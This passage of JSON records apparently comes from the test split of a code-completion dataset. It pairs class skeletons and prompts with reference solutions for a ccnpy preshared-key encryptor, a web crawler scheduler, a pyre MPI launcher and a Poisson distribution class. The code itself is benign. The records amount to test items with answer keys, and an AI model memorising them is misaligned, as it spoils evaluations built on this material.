auth_tag)\n<|end_body_1|>\n\n<|body_start_2|>\n security_ctx, encrypted_node, auth_tag = self.encrypt(node)\n manifest = ccnpy.flic.Manifest(security_ctx=security_ctx, node=encrypted_node, auth_tag=auth_tag)\n return manifest\n<|end_body_2|>\n\n<|body_start_3|>\n if not isinstance(encrypted_node, ccnpy.flic.EncryptedNode):\n raise TypeError('encrypted_node must be ccnpy.flic.EncryptedNode')\n if security_ctx is None:\n raise ValueError('security context must not be None')\n if not isinstance(security_ctx, ccnpy.flic.presharedkey.PresharedKeyCtx):\n raise TypeError('security_ctx must be a ccnpy.flic.PresharedKeyCtx')\n if auth_tag is None:\n raise ValueError('auth_tag must not be None')\n if not isinstance(auth_tag, ccnpy.flic.AuthTag):\n raise TypeError('auth_tag must be ccnpy.flic.AuthTag')\n if security_ctx.key_number() != self._key_number:\n raise ValueError('security_ctx.key_number %r != our key_number %r' % 
(security_ctx.key_number(), self._key_number))\n plaintext = self._key.decrypt(nonce=security_ctx.iv(), ciphertext=encrypted_node.value(), associated_data=security_ctx.serialize(), auth_tag=auth_tag.value())\n node_tlv = ccnpy.Tlv(ccnpy.flic.Node.class_type(), plaintext)\n node = ccnpy.flic.Node.parse(node_tlv)\n return node\n<|end_body_3|>\n\n<|body_start_4|>\n if not isinstance(encrypted_manifest, ccnpy.flic.Manifest):\n raise TypeError('encrypted_manifest must be ccnpy.flic.Manifest')\n security_ctx = encrypted_manifest.security_ctx()\n encrypted_node = encrypted_manifest.node()\n auth_tag = encrypted_manifest.auth_tag()\n if not isinstance(encrypted_node, ccnpy.flic.EncryptedNode):\n raise TypeError('manifest did not contain an encrypted node')\n if security_ctx is None:\n raise ValueError('security context must not be None')\n if not isinstance(security_ctx, PresharedKeyCtx):\n raise TypeError('security_ctx must be a ccnpy.flic.PresharedKeyCtx')\n if auth_tag is None:\n raise ValueError('auth_tag must not be None')\n node = self.decrypt_node(security_ctx=security_ctx, encrypted_node=encrypted_node, auth_tag=auth_tag)\n manifest = ccnpy.flic.Manifest(node=node)\n return manifest\n<|end_body_4|>\n", "revision_id": "20d982e2e3845818fde7f3facdc8cbcdff323dbb", "skeleton": "<|skeleton|>\nclass PresharedKey:\n \"\"\"The PresharedKey algorithm. Typically, you will use `PresharedKey.create_manifest(...)` to create a Manifest TLV out of a ccnpy.flic.Node.\"\"\"\n\n def __init__(self, key, key_number):\n \"\"\":param key: A ccnpy.crypto.AesGcmKey :param key_number: An integer used to reference the key\"\"\"\n <|body_0|>\n\n def encrypt(self, node):\n \"\"\":param node: A ccnpy.flic.Node :return: (security_ctx, encrypted_node, auth_tag)\"\"\"\n <|body_1|>\n\n def create_encrypted_manifest(self, node):\n \"\"\":param node: A ccnpy.flic.Node to encrypt and wrap in a Manifest :return: A ccnpy.flic.Manifest\"\"\"\n <|body_2|>\n\n def decrypt_node(self, security_ctx, encrypted_node, auth_tag):\n \"\"\"Example: manifest = ccnpy.flic.Manifest.deserialize(payload.value()) if isinstance(manifest.security_ctx(), ccnpy.flic.PresharedKeyCtx): # keystore is not necessarily provided key = keystore.get(manifest.security_ctx().key_number()) psk = ccnpy.flic.PresharedKey(key) node = psk.decrypt_node(manifest.security_ctx(), manifest.node(), manifest.auth_tag()) :param security_ctx: A ccnpy.flic.PresharedKeyCtx :param encrypted_node: A ccnpy.flic.EncryptedNode :param auth_tag: A ccnpy.flic.AuthTag :return: a ccnpy.flic.Node\"\"\"\n <|body_3|>\n\n def decrypt_manifest(self, encrypted_manifest):\n \"\"\"Example: manifest = ccnpy.flic.Manifest.deserialize(payload.value()) if isinstance(manifest.security_ctx(), ccnpy.flic.PresharedKeyCtx): # keystore is not necessarily provided key = keystore.get(manifest.security_ctx().key_number()) psk = ccnpy.flic.PresharedKey(key) manifest = psk.decrypt_to_manifest(manifest) :param encrypted_manifest: :return: A decrypted manifest\"\"\"\n <|body_4|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class PresharedKey:\n \"\"\"The PresharedKey algorithm. 
Typically, you will use `PresharedKey.create_manifest(...)` to create a Manifest TLV out of a ccnpy.flic.Node.\"\"\"\n\n def __init__(self, key, key_number):\n \"\"\":param key: A ccnpy.crypto.AesGcmKey :param key_number: An integer used to reference the key\"\"\"\n if not isinstance(key, ccnpy.crypto.AesGcmKey):\n raise TypeError('key must be ccnpy.crypto.AesGcmKey')\n self._key = key\n self._key_number = key_number\n\n def encrypt(self, node):\n \"\"\":param node: A ccnpy.flic.Node :return: (security_ctx, encrypted_node, auth_tag)\"\"\"\n if not isinstance(node, ccnpy.flic.Node):\n raise TypeError('node must be ccnpy.flic.Node')\n plaintext = node.serialized_value()\n iv = self._key.nonce()\n security_ctx = None\n if len(self._key) == 128:\n security_ctx = PresharedKeyCtx.create_aes_gcm_128(key_number=self._key_number, iv=iv)\n elif len(self._key) == 256:\n security_ctx = PresharedKeyCtx.create_aes_gcm_256(key_number=self._key_number, iv=iv)\n else:\n raise ValueError('Unsupported key length %r' % len(self._key))\n ciphertext, a = self._key.encrypt(nonce=iv, plaintext=plaintext, associated_data=security_ctx.serialize())\n encrypted_node = ccnpy.flic.EncryptedNode(ciphertext)\n auth_tag = ccnpy.flic.AuthTag(a)\n return (security_ctx, encrypted_node, auth_tag)\n\n def create_encrypted_manifest(self, node):\n \"\"\":param node: A ccnpy.flic.Node to encrypt and wrap in a Manifest :return: A ccnpy.flic.Manifest\"\"\"\n security_ctx, encrypted_node, auth_tag = self.encrypt(node)\n manifest = ccnpy.flic.Manifest(security_ctx=security_ctx, node=encrypted_node, auth_tag=auth_tag)\n return manifest\n\n def decrypt_node(self, security_ctx, encrypted_node, auth_tag):\n \"\"\"Example: manifest = ccnpy.flic.Manifest.deserialize(payload.value()) if isinstance(manifest.security_ctx(), ccnpy.flic.PresharedKeyCtx): # keystore is not necessarily provided key = keystore.get(manifest.security_ctx().key_number()) psk = ccnpy.flic.PresharedKey(key) node = psk.decrypt_node(manifest.security_ctx(), manifest.node(), manifest.auth_tag()) :param security_ctx: A ccnpy.flic.PresharedKeyCtx :param encrypted_node: A ccnpy.flic.EncryptedNode :param auth_tag: A ccnpy.flic.AuthTag :return: a ccnpy.flic.Node\"\"\"\n if not isinstance(encrypted_node, ccnpy.flic.EncryptedNode):\n raise TypeError('encrypted_node must be ccnpy.flic.EncryptedNode')\n if security_ctx is None:\n raise ValueError('security context must not be None')\n if not isinstance(security_ctx, ccnpy.flic.presharedkey.PresharedKeyCtx):\n raise TypeError('security_ctx must be a ccnpy.flic.PresharedKeyCtx')\n if auth_tag is None:\n raise ValueError('auth_tag must not be None')\n if not isinstance(auth_tag, ccnpy.flic.AuthTag):\n raise TypeError('auth_tag must be ccnpy.flic.AuthTag')\n if security_ctx.key_number() != self._key_number:\n raise ValueError('security_ctx.key_number %r != our key_number %r' % (security_ctx.key_number(), self._key_number))\n plaintext = self._key.decrypt(nonce=security_ctx.iv(), ciphertext=encrypted_node.value(), associated_data=security_ctx.serialize(), auth_tag=auth_tag.value())\n node_tlv = ccnpy.Tlv(ccnpy.flic.Node.class_type(), plaintext)\n node = ccnpy.flic.Node.parse(node_tlv)\n return node\n\n def decrypt_manifest(self, encrypted_manifest):\n \"\"\"Example: manifest = ccnpy.flic.Manifest.deserialize(payload.value()) if isinstance(manifest.security_ctx(), ccnpy.flic.PresharedKeyCtx): # keystore is not necessarily provided key = keystore.get(manifest.security_ctx().key_number()) psk = ccnpy.flic.PresharedKey(key) manifest = 
psk.decrypt_to_manifest(manifest) :param encrypted_manifest: :return: A decrypted manifest\"\"\"\n if not isinstance(encrypted_manifest, ccnpy.flic.Manifest):\n raise TypeError('encrypted_manifest must be ccnpy.flic.Manifest')\n security_ctx = encrypted_manifest.security_ctx()\n encrypted_node = encrypted_manifest.node()\n auth_tag = encrypted_manifest.auth_tag()\n if not isinstance(encrypted_node, ccnpy.flic.EncryptedNode):\n raise TypeError('manifest did not contain an encrypted node')\n if security_ctx is None:\n raise ValueError('security context must not be None')\n if not isinstance(security_ctx, PresharedKeyCtx):\n raise TypeError('security_ctx must be a ccnpy.flic.PresharedKeyCtx')\n if auth_tag is None:\n raise ValueError('auth_tag must not be None')\n node = self.decrypt_node(security_ctx=security_ctx, encrypted_node=encrypted_node, auth_tag=auth_tag)\n manifest = ccnpy.flic.Manifest(node=node)\n return manifest\n", "source": "the_stack_v2_python_sparse", "source_path": "ccnpy/flic/presharedkey/PresharedKey.py", "source_repo": "mmosko/ccnpy", "split": "test", "star_events_count": 1} {"blob_id": "49351ca26b81f564b6f4ca7db0dafa3445807fc6", "bodies": ["self.urls = urls.Urls()\nself.parserHTML = Parser()\nself.output = Output()", "self.urls.add_new_url(root_url)\nwhile self.urls.get_new_urls_length() > 0:\n try:\n url = self.urls.get_new_url()\n flag, content = download.download(url)\n if flag:\n links, datas = self.parserHTML.parser_html(url, content)\n self.urls.add_new_urls(links)\n self.output.store_datas(datas)\n else:\n print(content)\n except Exception as e:\n print(e, 'crawler fail')\nself.output.to_html()"], "bodies_text": "<|body_start_0|>\n self.urls = urls.Urls()\n self.parserHTML = Parser()\n self.output = Output()\n<|end_body_0|>\n\n<|body_start_1|>\n self.urls.add_new_url(root_url)\n while self.urls.get_new_urls_length() > 0:\n try:\n url = self.urls.get_new_url()\n flag, content = download.download(url)\n if flag:\n links, datas = self.parserHTML.parser_html(url, content)\n self.urls.add_new_urls(links)\n self.output.store_datas(datas)\n else:\n print(content)\n except Exception as e:\n print(e, 'crawler fail')\n self.output.to_html()\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Scheduler", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Scheduler:\n\n def __init__(self):\n \"\"\"初始化调度器\"\"\"\n <|body_0|>\n\n def crawler(self, root_url):\n \"\"\"根据入口文件,开始爬取需要的内容和urls :param root_url: :return:\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.urls = urls.Urls()\n self.parserHTML = Parser()\n self.output = Output()\n<|end_body_0|>\n\n<|body_start_1|>\n self.urls.add_new_url(root_url)\n while self.urls.get_new_urls_length() > 0:\n try:\n url = self.urls.get_new_url()\n flag, content = download.download(url)\n if flag:\n links, datas = self.parserHTML.parser_html(url, content)\n self.urls.add_new_urls(links)\n self.output.store_datas(datas)\n else:\n print(content)\n except Exception as e:\n print(e, 'crawler fail')\n self.output.to_html()\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000024", "length_bytes": 3453, "license_type": "permissive", "methods": [{"docstring": "初始化调度器", "name": "__init__", "signature": "def __init__(self)"}, {"docstring": "根据入口文件,开始爬取需要的内容和urls :param root_url: :return:", "name": "crawler", "signature": "def crawler(self, root_url)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_002526", "prompt": "Implement the 
Python class `Scheduler` described below.\n\nClass description:\nImplement the Scheduler class.\n\nMethod signatures and docstrings:\n- def __init__(self): 初始化调度器\n- def crawler(self, root_url): 根据入口文件,开始爬取需要的内容和urls :param root_url: :return:", "prompted_full_text": "Implement the Python class `Scheduler` described below.\n\nClass description:\nImplement the Scheduler class.\n\nMethod signatures and docstrings:\n- def __init__(self): 初始化调度器\n- def crawler(self, root_url): 根据入口文件,开始爬取需要的内容和urls :param root_url: :return:\n\n<|skeleton|>\nclass Scheduler:\n\n def __init__(self):\n \"\"\"初始化调度器\"\"\"\n <|body_0|>\n\n def crawler(self, root_url):\n \"\"\"根据入口文件,开始爬取需要的内容和urls :param root_url: :return:\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.urls = urls.Urls()\n self.parserHTML = Parser()\n self.output = Output()\n<|end_body_0|>\n\n<|body_start_1|>\n self.urls.add_new_url(root_url)\n while self.urls.get_new_urls_length() > 0:\n try:\n url = self.urls.get_new_url()\n flag, content = download.download(url)\n if flag:\n links, datas = self.parserHTML.parser_html(url, content)\n self.urls.add_new_urls(links)\n self.output.store_datas(datas)\n else:\n print(content)\n except Exception as e:\n print(e, 'crawler fail')\n self.output.to_html()\n<|end_body_1|>\n", "revision_id": "345e34fff7386d91acbb03a01fd4127c5dfed037", "skeleton": "<|skeleton|>\nclass Scheduler:\n\n def __init__(self):\n \"\"\"初始化调度器\"\"\"\n <|body_0|>\n\n def crawler(self, root_url):\n \"\"\"根据入口文件,开始爬取需要的内容和urls :param root_url: :return:\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Scheduler:\n def __init__(self):\n \"\"\"初始化调度器\"\"\"\n self.urls = urls.Urls()\n self.parserHTML = Parser()\n self.output = Output()\n\n def crawler(self, root_url):\n \"\"\"根据入口文件,开始爬取需要的内容和urls :param root_url: :return:\"\"\"\n self.urls.add_new_url(root_url)\n while self.urls.get_new_urls_length() > 0:\n try:\n url = self.urls.get_new_url()\n flag, content = download.download(url)\n if flag:\n links, datas = self.parserHTML.parser_html(url, content)\n self.urls.add_new_urls(links)\n self.output.store_datas(datas)\n else:\n print(content)\n except Exception as e:\n print(e, 'crawler fail')\n self.output.to_html()\n", "source": "the_stack_v2_python_sparse", "source_path": "projects/crawler_for_blogs/crawler_blogs.py", "source_repo": "ice-melt/python_code_manager", "split": "test", "star_events_count": 0} {"blob_id": "f17eac5a734194eba918cb8a2185f3505e4f5e9f", "bodies": ["if self.auto:\n try:\n application.pyre_mpi(*args, **kwds)\n except AttributeError:\n pass\n return self.spawn(*args, application=application, **kwds)\nreturn self.parallel(*args, application=application, **kwds)", "import mpi\nif mpi.init():\n self.world = mpi.world\n return super().launch(*args, **kwds)\nimport journal\nchannel = journal.error('mpi.init')\nchannel.log('failed to initialize the mpi runtime support')\nreturn 1", "argv = self.buildCommandLine()\noptions = {'args': argv, 'universal_newlines': True, 'shell': False}\nstatus = 42\nwith subprocess.Popen(**options) as child:\n status = child.wait()\nreturn status", "launcher = self.mpi.launcher\ninterpreter = sys.executable\nhosts = self.hosts\ntasks = self.tasks\nhostfile = self.hostfile\nextra = self.extra\nargv = [launcher]\nargv += ['-n', str(hosts * tasks)]\nif hostfile:\n argv += ['--hostfile', str(hostfile)]\nif extra:\n argv += extra.split()\nargv += [interpreter]\nargv += 
sys.argv\nargv += [f'--shell.hosts={hosts}', f'--shell.tasks={tasks}']\nargv += [f'--shell.auto=no']\nreturn argv"], "bodies_text": "<|body_start_0|>\n if self.auto:\n try:\n application.pyre_mpi(*args, **kwds)\n except AttributeError:\n pass\n return self.spawn(*args, application=application, **kwds)\n return self.parallel(*args, application=application, **kwds)\n<|end_body_0|>\n\n<|body_start_1|>\n import mpi\n if mpi.init():\n self.world = mpi.world\n return super().launch(*args, **kwds)\n import journal\n channel = journal.error('mpi.init')\n channel.log('failed to initialize the mpi runtime support')\n return 1\n<|end_body_1|>\n\n<|body_start_2|>\n argv = self.buildCommandLine()\n options = {'args': argv, 'universal_newlines': True, 'shell': False}\n status = 42\n with subprocess.Popen(**options) as child:\n status = child.wait()\n return status\n<|end_body_2|>\n\n<|body_start_3|>\n launcher = self.mpi.launcher\n interpreter = sys.executable\n hosts = self.hosts\n tasks = self.tasks\n hostfile = self.hostfile\n extra = self.extra\n argv = [launcher]\n argv += ['-n', str(hosts * tasks)]\n if hostfile:\n argv += ['--hostfile', str(hostfile)]\n if extra:\n argv += extra.split()\n argv += [interpreter]\n argv += sys.argv\n argv += [f'--shell.hosts={hosts}', f'--shell.tasks={tasks}']\n argv += [f'--shell.auto=no']\n return argv\n<|end_body_3|>\n", "class_docstring": "Encapsulation of launching an MPI job using {mpirun}", "class_name": "Launcher", "detected_licenses": ["BSD-3-Clause"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Launcher:\n \"\"\"Encapsulation of launching an MPI job using {mpirun}\"\"\"\n\n def launch(self, application, *args, **kwds):\n \"\"\"Launch {application} as a collection of mpi tasks\"\"\"\n <|body_0|>\n\n def parallel(self, *args, **kwds):\n \"\"\"Called after the parallel machine has been built and it is time to invoke the user's code in every node\"\"\"\n <|body_1|>\n\n def spawn(self, application, *args, **kwds):\n \"\"\"Invoke {mpirun} with the correct arguments to create the parallel machine\"\"\"\n <|body_2|>\n\n def buildCommandLine(self):\n \"\"\"Construct the mpirun command line\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if self.auto:\n try:\n application.pyre_mpi(*args, **kwds)\n except AttributeError:\n pass\n return self.spawn(*args, application=application, **kwds)\n return self.parallel(*args, application=application, **kwds)\n<|end_body_0|>\n\n<|body_start_1|>\n import mpi\n if mpi.init():\n self.world = mpi.world\n return super().launch(*args, **kwds)\n import journal\n channel = journal.error('mpi.init')\n channel.log('failed to initialize the mpi runtime support')\n return 1\n<|end_body_1|>\n\n<|body_start_2|>\n argv = self.buildCommandLine()\n options = {'args': argv, 'universal_newlines': True, 'shell': False}\n status = 42\n with subprocess.Popen(**options) as child:\n status = child.wait()\n return status\n<|end_body_2|>\n\n<|body_start_3|>\n launcher = self.mpi.launcher\n interpreter = sys.executable\n hosts = self.hosts\n tasks = self.tasks\n hostfile = self.hostfile\n extra = self.extra\n argv = [launcher]\n argv += ['-n', str(hosts * tasks)]\n if hostfile:\n argv += ['--hostfile', str(hostfile)]\n if extra:\n argv += extra.split()\n argv += [interpreter]\n argv += sys.argv\n argv += [f'--shell.hosts={hosts}', f'--shell.tasks={tasks}']\n argv += [f'--shell.auto=no']\n return argv\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000025", "length_bytes": 5102, 
"license_type": "permissive", "methods": [{"docstring": "Launch {application} as a collection of mpi tasks", "name": "launch", "signature": "def launch(self, application, *args, **kwds)"}, {"docstring": "Called after the parallel machine has been built and it is time to invoke the user's code in every node", "name": "parallel", "signature": "def parallel(self, *args, **kwds)"}, {"docstring": "Invoke {mpirun} with the correct arguments to create the parallel machine", "name": "spawn", "signature": "def spawn(self, application, *args, **kwds)"}, {"docstring": "Construct the mpirun command line", "name": "buildCommandLine", "signature": "def buildCommandLine(self)"}], "n_methods": 4, "prompt": "Implement the Python class `Launcher` described below.\n\nClass description:\nEncapsulation of launching an MPI job using {mpirun}\n\nMethod signatures and docstrings:\n- def launch(self, application, *args, **kwds): Launch {application} as a collection of mpi tasks\n- def parallel(self, *args, **kwds): Called after the parallel machine has been built and it is time to invoke the user's code in every node\n- def spawn(self, application, *args, **kwds): Invoke {mpirun} with the correct arguments to create the parallel machine\n- def buildCommandLine(self): Construct the mpirun command line", "prompted_full_text": "Implement the Python class `Launcher` described below.\n\nClass description:\nEncapsulation of launching an MPI job using {mpirun}\n\nMethod signatures and docstrings:\n- def launch(self, application, *args, **kwds): Launch {application} as a collection of mpi tasks\n- def parallel(self, *args, **kwds): Called after the parallel machine has been built and it is time to invoke the user's code in every node\n- def spawn(self, application, *args, **kwds): Invoke {mpirun} with the correct arguments to create the parallel machine\n- def buildCommandLine(self): Construct the mpirun command line\n\n<|skeleton|>\nclass Launcher:\n \"\"\"Encapsulation of launching an MPI job using {mpirun}\"\"\"\n\n def launch(self, application, *args, **kwds):\n \"\"\"Launch {application} as a collection of mpi tasks\"\"\"\n <|body_0|>\n\n def parallel(self, *args, **kwds):\n \"\"\"Called after the parallel machine has been built and it is time to invoke the user's code in every node\"\"\"\n <|body_1|>\n\n def spawn(self, application, *args, **kwds):\n \"\"\"Invoke {mpirun} with the correct arguments to create the parallel machine\"\"\"\n <|body_2|>\n\n def buildCommandLine(self):\n \"\"\"Construct the mpirun command line\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if self.auto:\n try:\n application.pyre_mpi(*args, **kwds)\n except AttributeError:\n pass\n return self.spawn(*args, application=application, **kwds)\n return self.parallel(*args, application=application, **kwds)\n<|end_body_0|>\n\n<|body_start_1|>\n import mpi\n if mpi.init():\n self.world = mpi.world\n return super().launch(*args, **kwds)\n import journal\n channel = journal.error('mpi.init')\n channel.log('failed to initialize the mpi runtime support')\n return 1\n<|end_body_1|>\n\n<|body_start_2|>\n argv = self.buildCommandLine()\n options = {'args': argv, 'universal_newlines': True, 'shell': False}\n status = 42\n with subprocess.Popen(**options) as child:\n status = child.wait()\n return status\n<|end_body_2|>\n\n<|body_start_3|>\n launcher = self.mpi.launcher\n interpreter = sys.executable\n hosts = self.hosts\n tasks = self.tasks\n hostfile = self.hostfile\n extra = self.extra\n argv = [launcher]\n argv += ['-n', str(hosts * 
tasks)]\n if hostfile:\n argv += ['--hostfile', str(hostfile)]\n if extra:\n argv += extra.split()\n argv += [interpreter]\n argv += sys.argv\n argv += [f'--shell.hosts={hosts}', f'--shell.tasks={tasks}']\n argv += [f'--shell.auto=no']\n return argv\n<|end_body_3|>\n", "revision_id": "d741c44ffb3e9e1f726bf492202ac8738bb4aa1c", "skeleton": "<|skeleton|>\nclass Launcher:\n \"\"\"Encapsulation of launching an MPI job using {mpirun}\"\"\"\n\n def launch(self, application, *args, **kwds):\n \"\"\"Launch {application} as a collection of mpi tasks\"\"\"\n <|body_0|>\n\n def parallel(self, *args, **kwds):\n \"\"\"Called after the parallel machine has been built and it is time to invoke the user's code in every node\"\"\"\n <|body_1|>\n\n def spawn(self, application, *args, **kwds):\n \"\"\"Invoke {mpirun} with the correct arguments to create the parallel machine\"\"\"\n <|body_2|>\n\n def buildCommandLine(self):\n \"\"\"Construct the mpirun command line\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Launcher:\n \"\"\"Encapsulation of launching an MPI job using {mpirun}\"\"\"\n\n def launch(self, application, *args, **kwds):\n \"\"\"Launch {application} as a collection of mpi tasks\"\"\"\n if self.auto:\n try:\n application.pyre_mpi(*args, **kwds)\n except AttributeError:\n pass\n return self.spawn(*args, application=application, **kwds)\n return self.parallel(*args, application=application, **kwds)\n\n def parallel(self, *args, **kwds):\n \"\"\"Called after the parallel machine has been built and it is time to invoke the user's code in every node\"\"\"\n import mpi\n if mpi.init():\n self.world = mpi.world\n return super().launch(*args, **kwds)\n import journal\n channel = journal.error('mpi.init')\n channel.log('failed to initialize the mpi runtime support')\n return 1\n\n def spawn(self, application, *args, **kwds):\n \"\"\"Invoke {mpirun} with the correct arguments to create the parallel machine\"\"\"\n argv = self.buildCommandLine()\n options = {'args': argv, 'universal_newlines': True, 'shell': False}\n status = 42\n with subprocess.Popen(**options) as child:\n status = child.wait()\n return status\n\n def buildCommandLine(self):\n \"\"\"Construct the mpirun command line\"\"\"\n launcher = self.mpi.launcher\n interpreter = sys.executable\n hosts = self.hosts\n tasks = self.tasks\n hostfile = self.hostfile\n extra = self.extra\n argv = [launcher]\n argv += ['-n', str(hosts * tasks)]\n if hostfile:\n argv += ['--hostfile', str(hostfile)]\n if extra:\n argv += extra.split()\n argv += [interpreter]\n argv += sys.argv\n argv += [f'--shell.hosts={hosts}', f'--shell.tasks={tasks}']\n argv += [f'--shell.auto=no']\n return argv\n", "source": "the_stack_v2_python_sparse", "source_path": "packages/mpi/Launcher.py", "source_repo": "pyre/pyre", "split": "test", "star_events_count": 27} {"blob_id": "d14e88a42aa4d1d53c01c1403d6692a8a5b6ef88", "bodies": ["if data is None and isinstance(lambtha, (float, int)):\n if lambtha <= 0:\n raise ValueError('lambtha must be a positive value')\n self.lambtha = float(lambtha)\nelif data is not None:\n if not isinstance(data, list):\n raise TypeError('data must be a list')\n if len(data) < 2:\n raise ValueError('data must contain multiple values')\n self.lambtha = float(sum(data) / len(data))", "if not isinstance(k, int):\n k = int(k)\nif k is None or k < 0:\n return 0\nreturn self.lambtha ** k * Poisson.e ** (-1 * self.lambtha) / self.fact(k)", "if k in 
[0, 1]:\n return 1\nreturn k * self.fact(k - 1)", "if not isinstance(k, int):\n k = int(k)\nif k is None or k < 0:\n return 0\nreturn Poisson.e ** (-1 * self.lambtha) * sum([self.lambtha ** i / self.fact(i) for i in range(0, k + 1)])"], "bodies_text": "<|body_start_0|>\n if data is None and isinstance(lambtha, (float, int)):\n if lambtha <= 0:\n raise ValueError('lambtha must be a positive value')\n self.lambtha = float(lambtha)\n elif data is not None:\n if not isinstance(data, list):\n raise TypeError('data must be a list')\n if len(data) < 2:\n raise ValueError('data must contain multiple values')\n self.lambtha = float(sum(data) / len(data))\n<|end_body_0|>\n\n<|body_start_1|>\n if not isinstance(k, int):\n k = int(k)\n if k is None or k < 0:\n return 0\n return self.lambtha ** k * Poisson.e ** (-1 * self.lambtha) / self.fact(k)\n<|end_body_1|>\n\n<|body_start_2|>\n if k in [0, 1]:\n return 1\n return k * self.fact(k - 1)\n<|end_body_2|>\n\n<|body_start_3|>\n if not isinstance(k, int):\n k = int(k)\n if k is None or k < 0:\n return 0\n return Poisson.e ** (-1 * self.lambtha) * sum([self.lambtha ** i / self.fact(i) for i in range(0, k + 1)])\n<|end_body_3|>\n", "class_docstring": "define class", "class_name": "Poisson", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Poisson:\n \"\"\"define class\"\"\"\n\n def __init__(self, data=None, lambtha=1.0):\n \"\"\"class constructor\"\"\"\n <|body_0|>\n\n def pmf(self, k):\n \"\"\"function that calculates the probability mass function for k successes\"\"\"\n <|body_1|>\n\n def fact(self, k):\n \"\"\"function that returns the factorial of k\"\"\"\n <|body_2|>\n\n def cdf(self, k):\n \"\"\"function that calculates the cumulative distribution function for k successes\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if data is None and isinstance(lambtha, (float, int)):\n if lambtha <= 0:\n raise ValueError('lambtha must be a positive value')\n self.lambtha = float(lambtha)\n elif data is not None:\n if not isinstance(data, list):\n raise TypeError('data must be a list')\n if len(data) < 2:\n raise ValueError('data must contain multiple values')\n self.lambtha = float(sum(data) / len(data))\n<|end_body_0|>\n\n<|body_start_1|>\n if not isinstance(k, int):\n k = int(k)\n if k is None or k < 0:\n return 0\n return self.lambtha ** k * Poisson.e ** (-1 * self.lambtha) / self.fact(k)\n<|end_body_1|>\n\n<|body_start_2|>\n if k in [0, 1]:\n return 1\n return k * self.fact(k - 1)\n<|end_body_2|>\n\n<|body_start_3|>\n if not isinstance(k, int):\n k = int(k)\n if k is None or k < 0:\n return 0\n return Poisson.e ** (-1 * self.lambtha) * sum([self.lambtha ** i / self.fact(i) for i in range(0, k + 1)])\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000026", "length_bytes": 1678, "license_type": "no_license", "methods": [{"docstring": "class constructor", "name": "__init__", "signature": "def __init__(self, data=None, lambtha=1.0)"}, {"docstring": "function that calculates the probability mass function for k successes", "name": "pmf", "signature": "def pmf(self, k)"}, {"docstring": "function that returns the factorial of k", "name": "fact", "signature": "def fact(self, k)"}, {"docstring": "function that calculates the cumulative distribution function for k successes", "name": "cdf", "signature": "def cdf(self, k)"}], "n_methods": 4, "original_id": "stack_v2_sparse_classes_30k_train_002762", "prompt": "Implement the Python class `Poisson` described below.\n\nClass 
description:\ndefine class\n\nMethod signatures and docstrings:\n- def __init__(self, data=None, lambtha=1.0): class constructor\n- def pmf(self, k): function that calculates the probability mass function for k successes\n- def fact(self, k): function that returns the factorial of k\n- def cdf(self, k): function that calculates the cumulative distribution function for k successes", "prompted_full_text": "Implement the Python class `Poisson` described below.\n\nClass description:\ndefine class\n\nMethod signatures and docstrings:\n- def __init__(self, data=None, lambtha=1.0): class constructor\n- def pmf(self, k): function that calculates the probability mass function for k successes\n- def fact(self, k): function that returns the factorial of k\n- def cdf(self, k): function that calculates the cumulative distribution function for k successes\n\n<|skeleton|>\nclass Poisson:\n \"\"\"define class\"\"\"\n\n def __init__(self, data=None, lambtha=1.0):\n \"\"\"class constructor\"\"\"\n <|body_0|>\n\n def pmf(self, k):\n \"\"\"function that calculates the probability mass function for k successes\"\"\"\n <|body_1|>\n\n def fact(self, k):\n \"\"\"function that returns the factorial of k\"\"\"\n <|body_2|>\n\n def cdf(self, k):\n \"\"\"function that calculates the cumulative distribution function for k successes\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if data is None and isinstance(lambtha, (float, int)):\n if lambtha <= 0:\n raise ValueError('lambtha must be a positive value')\n self.lambtha = float(lambtha)\n elif data is not None:\n if not isinstance(data, list):\n raise TypeError('data must be a list')\n if len(data) < 2:\n raise ValueError('data must contain multiple values')\n self.lambtha = float(sum(data) / len(data))\n<|end_body_0|>\n\n<|body_start_1|>\n if not isinstance(k, int):\n k = int(k)\n if k is None or k < 0:\n return 0\n return self.lambtha ** k * Poisson.e ** (-1 * self.lambtha) / self.fact(k)\n<|end_body_1|>\n\n<|body_start_2|>\n if k in [0, 1]:\n return 1\n return k * self.fact(k - 1)\n<|end_body_2|>\n\n<|body_start_3|>\n if not isinstance(k, int):\n k = int(k)\n if k is None or k < 0:\n return 0\n return Poisson.e ** (-1 * self.lambtha) * sum([self.lambtha ** i / self.fact(i) for i in range(0, k + 1)])\n<|end_body_3|>\n", "revision_id": "7d3b348aec3b20da25b162b71f150c87c7c28d71", "skeleton": "<|skeleton|>\nclass Poisson:\n \"\"\"define class\"\"\"\n\n def __init__(self, data=None, lambtha=1.0):\n \"\"\"class constructor\"\"\"\n <|body_0|>\n\n def pmf(self, k):\n \"\"\"function that calculates the probability mass function for k successes\"\"\"\n <|body_1|>\n\n def fact(self, k):\n \"\"\"function that returns the factorial of k\"\"\"\n <|body_2|>\n\n def cdf(self, k):\n \"\"\"function that calculates the cumulative distribution function for k 